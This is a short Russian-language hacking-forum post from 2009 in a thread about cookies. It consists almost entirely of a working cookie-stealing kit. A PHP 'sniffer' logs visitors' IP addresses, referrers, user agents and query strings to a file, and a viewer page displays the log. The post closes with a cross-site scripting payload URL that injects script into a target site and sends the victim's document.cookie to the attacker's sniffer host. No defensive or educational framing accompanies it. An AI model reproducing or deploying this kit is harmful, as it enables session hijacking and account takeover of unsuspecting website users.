Тема: Куки
Показать сообщение отдельно

  #10  
Старый 12.07.2009, 19:18
Failure
Участник форума
Регистрация: 21.09.2008
Сообщений: 148
С нами: 9282050

Репутация: 102
По умолчанию

sniff.php
PHP код:
<?php
$ip
=$_SERVER["REMOTE_ADDR"];
$ref=$_SERVER["HTTP_REFERER"];
$ua=$_SERVER["HTTP_USER_AGENT"];
$q=$_SERVER["QUERY_STRING"];
if(
$ref == "") {
$str "<b>$ip</b>  | Нет HTTP реферера | <br>Юзает: $ua |<br>QUERY_STRING: $q |<br>======================================================================================================";
}
else {
$str "<b>$ip</b>  | Пришел с :  <a href=$ref>$ref</a> | <br>Юзает: $ua |<br>QUERY_STRING:   $q   |<br>======================================================================================================";}

$file=fopen("log.txt","a+");
fwrite($file,"$str<br>");
fclose($file);
?>
<img src="http://img1.liveinternet.ru/images/attach/b/3/28/251/28251827_novoe.jpg">
log.php:
PHP код:
<?php
echo "<html>
<body>
<meta http-equiv; charset=windows-1251>
<title>WEB Sniffer</title>
<body bgcolor=black style=color:red>
<h1>WEB SNIFFER</h1>
<input type=submit value='Обновить' onClick=javascript:window.location='log.php'>
</form>
<br><br><br>
======================================================================================================<br>"
;
if(
file_exists("log.txt"))
require 
"log.txt";
echo 
"<br></body></html>";
?>
http://site.ru/folder/[XSS]="><script>window.location='http://sniff.ru/sniff.php?'+document.cookie;</script>
 
Ответить с цитированием